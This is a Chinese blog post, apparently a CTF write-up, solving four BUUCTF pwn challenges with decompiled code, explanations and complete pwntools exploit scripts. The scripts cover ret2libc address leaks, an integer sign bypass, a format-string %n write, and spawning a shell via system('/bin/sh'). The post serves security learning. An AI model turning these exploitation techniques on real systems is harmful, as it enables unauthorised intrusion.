
<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="utf-8" />
    <title>BUU Pwn Writeup _Day7.28 | PR0_M1X 的小站</title>
    <meta name="author" content="PR0_M1X" />
    <meta name="description" content="自力更生 艰苦奋斗" />
    <meta name="keywords" content="CTF" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>


<script src="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/contrib/auto-render.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css" />
<script src="/js/lib/math.js"></script>


<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>PR0_M1X 的小站</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
        <a target="_blank" rel="noopener" href="http://gz.crispsheep.icu:5000/display">
            <i class="fa-solid fa-eye fa-fw"></i>
            <span>&ensp;Observe</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;PR0_M1X 的小站</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
                <a target="_blank" rel="noopener" href="http://gz.crispsheep.icu:5000/display">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-eye fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Observe</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>BUU Pwn Writeup _Day7.28</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2025/7/28
        </span>
        
        <span class="category">
            <a href="/categories/Writeup/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                Writeup
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/Writeup/" style="color: #00a596">
                    Writeup
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/Pwn/" style="color: #00bcd4">
                    Pwn
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="BUU-Pwn-Writeup-Day7-28"><a href="#BUU-Pwn-Writeup-Day7-28" class="headerlink" title="BUU Pwn Writeup _Day7.28"></a>BUU Pwn Writeup _Day7.28</h1><p>最近刷的题的小集合。</p>
<span id="more"></span>



<h2 id="铁人三项-第五赛区-2018-rop-1"><a href="#铁人三项-第五赛区-2018-rop-1" class="headerlink" title="铁人三项(第五赛区)_2018_rop 1"></a>铁人三项(第五赛区)_2018_rop 1</h2><p>ida看到有vulnerable_function()函数。</p>
<pre><code class="language-c">ssize_t vulnerable_function()
&#123;
  char buf[136]; // [esp+10h] [ebp-88h] BYREF

  return read(0, buf, 0x100u);
&#125;
</code></pre>
<p>buf[136]设置了136字节，但是return的read却读了256字节，很明显的栈溢出。</p>
<p>看一眼strings表，也没有&#x2F;bin&#x2F;sh，函数表里也没有system，execve之类的函数。</p>
<p>一目了然，必然是ret2libc了。</p>
<p>理一下思路：先填满buf[136]，然后把ebp位置覆盖掉，就可以用write泄露write@got地址了。</p>
<table>
<thead>
<tr>
<th>栈地址</th>
<th>内容</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>缓冲区起始</td>
<td>b’A’*136</td>
<td>填满buf[136]</td>
</tr>
<tr>
<td>EBP位置</td>
<td>b’A’*4</td>
<td>覆盖EBP（32位为4字节，4*8bit）</td>
</tr>
<tr>
<td>返回地址</td>
<td>write@plt</td>
<td>覆盖为write的PLT</td>
</tr>
<tr>
<td>新的返回地址</td>
<td>main函数的地址</td>
<td>write执行后的返回地址</td>
</tr>
<tr>
<td>参数1</td>
<td>1</td>
<td>标准输出</td>
</tr>
<tr>
<td>参数2</td>
<td>write@got</td>
<td>泄露write函数的地址</td>
</tr>
<tr>
<td>参数3</td>
<td>4（长度）</td>
<td>32位，读4字节</td>
</tr>
</tbody></table>
<pre><code class="language-python">from pwn import *
from LibcSearcher import *

context(os=&quot;linux&quot;, arch=&quot;amd64&quot;, log_level=&quot;debug&quot;)
elf = ELF(&quot;./2018_rop&quot;)
p = remote(&quot;node5.buuoj.cn&quot;,28550)

write_plt = elf.plt[&quot;write&quot;]
write_got = elf.got[&quot;write&quot;]
main = elf.sym[&quot;main&quot;]

offset = 136+4

payload = b&#39;a&#39;*(0x88+4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) +p32(4)
p.sendline(payload)

write_addr = u32(p.recv(4))

libc = LibcSearcher(&quot;write&quot;, write_addr)
Offset = write_addr - libc.dump(&quot;write&quot;)

sys_addr = libc.dump(&quot;system&quot;)+Offset
binsh = libc.dump(&quot;str_bin_sh&quot;)+Offset

payload = b&quot;a&quot;*offset+p32(sys_addr)+p32(1)+p32(binsh)
p.sendline(payload)
p.interactive()
</code></pre>
<p>flag{6f0423b5-2621-4980-945d-ed713285a3d2}</p>
<h2 id="bjdctf-2020-babystack2-1"><a href="#bjdctf-2020-babystack2-1" class="headerlink" title="bjdctf_2020_babystack2 1"></a>bjdctf_2020_babystack2 1</h2><p>惯例上ida分析。</p>
<pre><code class="language-c">int __fastcall main(int argc, const char **argv, const char **envp)
&#123;
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts(&quot;**********************************&quot;);
  puts(&quot;*     Welcome to the BJDCTF!     *&quot;);
  puts(&quot;* And Welcome to the bin world!  *&quot;);
  puts(&quot;*  Let&#39;s try to pwn the world!   *&quot;);
  puts(&quot;* Please told me u answer loudly!*&quot;);
  puts(&quot;[+]Are u ready?&quot;);
  puts(&quot;[+]Please input the length of your name:&quot;);
  __isoc99_scanf(&quot;%d&quot;, &amp;nbytes);
  if ( (int)nbytes &gt; 10 )
  &#123;
    puts(&quot;Oops,u name is too long!&quot;);
    exit(-1);
  &#125;
  puts(&quot;[+]What&#39;s u name?&quot;);
  read(0, buf, (unsigned int)nbytes);
  return 0;
&#125;
</code></pre>
<p>main函数里定义了char buf[12]和size_t nbytes。</p>
<p>读取了一个数字到nbytes里，然后转换成int类型进行判断：如果大于10，直接退出。</p>
<p>但是后面又进行了一次类型转换，把nbytes转换成了unsigned int，无符号了。</p>
<p>这里就有点意思了。为什么？</p>
<p>int类型是有正有负的整数，而unsigned int只有大于等于0的整数。unsigned int利用了这个数据类型的所有二进制位。</p>
<p>再看一眼程序，有r开头的寄存器名，64位程序无疑了。</p>
<p>那么这个程序的size_t 就是8个字节，64个二进制位，非常大的数字。</p>
<p>如果用户输入了一个-1，那么nbytes的内容就是0xFFFFFFFFFFFFFFFF，在int类型下是-1，就可以绕过if判断了。</p>
<p>那么这时，read函数就会向buf[12]读入0xFFFFFFFFFFFFFFFF这么大坨数据，完全能把栈给干爆。</p>
<p>再看看函数表，有个后门函数。</p>
<p>接下来要做的就非常简单了，把栈填满，然后把rbp填满，再把后门函数传入即可。</p>
<p>看一眼栈，总共0x10长。</p>
<p>64位的rbp要想塞满得塞进8个字节的数据，总共要塞0x10+8字节。</p>
<pre><code class="language-python">from pwn import *
context.log_level = &quot;debug&quot;
p = remote(&quot;node5.buuoj.cn&quot;,27646)

payload1 = b&quot;-1&quot;
p.sendlineafter(b&quot;[+]Please input the length of your name:\n&quot;,payload1)

offset = 0x10+8
backdoor = 0x400726

payload2 = b&quot;a&quot;*offset + p64(backdoor)
p.sendlineafter(b&quot;[+]What&#39;s u name?\n&quot;,payload2)
p.interactive()
</code></pre>
<p>flag{8434b611-f849-4b48-a2ab-030c39235116}</p>
<h2 id="jarvisoj-fm"><a href="#jarvisoj-fm" class="headerlink" title="jarvisoj_fm"></a>jarvisoj_fm</h2><p>简单的格式化字符串漏洞。</p>
<pre><code class="language-c">int __cdecl main(int argc, const char **argv, const char **envp)
&#123;
  char buf[80]; // [esp+2Ch] [ebp-5Ch] BYREF
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x50u);
  printf(buf);
  printf(&quot;%d!\n&quot;, x);
  if ( x == 4 )
  &#123;
    puts(&quot;running sh...&quot;);
    system(&quot;/bin/sh&quot;);
  &#125;
  return 0;
&#125;
</code></pre>
<p>先手动运行一下，输入AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x看一下偏移。</p>
<p>偏移11，记下来。</p>
<p>再在ida中找一下x的地址，是0x0804A02C。</p>
<p>那就好办了。%n可以对指定地址的变量进行修改，修改成在%n之前的字节数，那就用这一招改一下。</p>
<pre><code class="language-python">from pwn import *

context.log_level = &quot;debug&quot;

str_offset = 11
x_addr = 0x0804A02C

p = process(&quot;./fm&quot;)
p = remote(&quot;node5.buuoj.cn&quot;,27913)

payload = p32(x_addr)+b&quot;%11$n&quot;
p.sendline(payload)

p.interactive()
</code></pre>
<p>因为刚好x_addr传入之后，字节长度是4，所以不用再加字符来凑偏移了。</p>
<h2 id="bjdctf-2020-babyrop"><a href="#bjdctf-2020-babyrop" class="headerlink" title="bjdctf_2020_babyrop"></a>bjdctf_2020_babyrop</h2><p>惯例ida看。</p>
<p>有一个vuln函数，设置了0x20字节的栈空间，read读了0x64字节，很明显的栈溢出。</p>
<p>看看函数表和字符串表，没有后门函数和binsh字符串，只能ret2libc。</p>
<p>程序是64位的，传参方式和32位程序还不太一样，需要用寄存器传参。</p>
<p>这里用ROPgadgets找一下有没有可以用到的gadgets。发现0x400733有一个pop rdi, ret，这是函数的第一个参数的寄存器，可以利用。</p>
<p>于是，用puts函数泄露地址，算出偏移再执行system(“&#x2F;bin&#x2F;sh”)，拿到flag。</p>
<pre><code class="language-Python">from pwn import *
from LibcSearcher import *

context(arch=&quot;amd64&quot;,os=&quot;linux&quot;,log_level=&quot;debug&quot;)

p = process(&quot;./bjdctf_2020_babyrop&quot;)
p = remote(&quot;node5.buuoj.cn&quot;,26215)

elf = ELF(&quot;./bjdctf_2020_babyrop&quot;)

puts_plt = elf.plt[&quot;puts&quot;]
puts_got = elf.got[&quot;puts&quot;]
main = elf.sym[&quot;main&quot;]
pop_rdi = 0x400733
offset = 0x20+8

payload = b&quot;a&quot;*offset +p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main) 

p.sendlineafter(&quot;Pull up your sword and tell me u story!\n&quot;,payload)
puts_addr = u64(p.recv(6).ljust(8, b&quot;\x00&quot;))
print(hex(puts_addr))

libc = LibcSearcher(&quot;puts&quot;, puts_addr)
Offset = puts_addr - libc.dump(&quot;puts&quot;)
sys_addr = libc.dump(&quot;system&quot;)+Offset
binsh_addr = libc.dump(&quot;str_bin_sh&quot;)+Offset

payload = b&quot;a&quot;*offset + p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
p.sendlineafter(&quot;Pull up your sword and tell me u story!\n&quot;,payload)

p.interactive()
</code></pre>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2020 - 2026 PR0_M1X 的小站
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;PR0_M1X
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
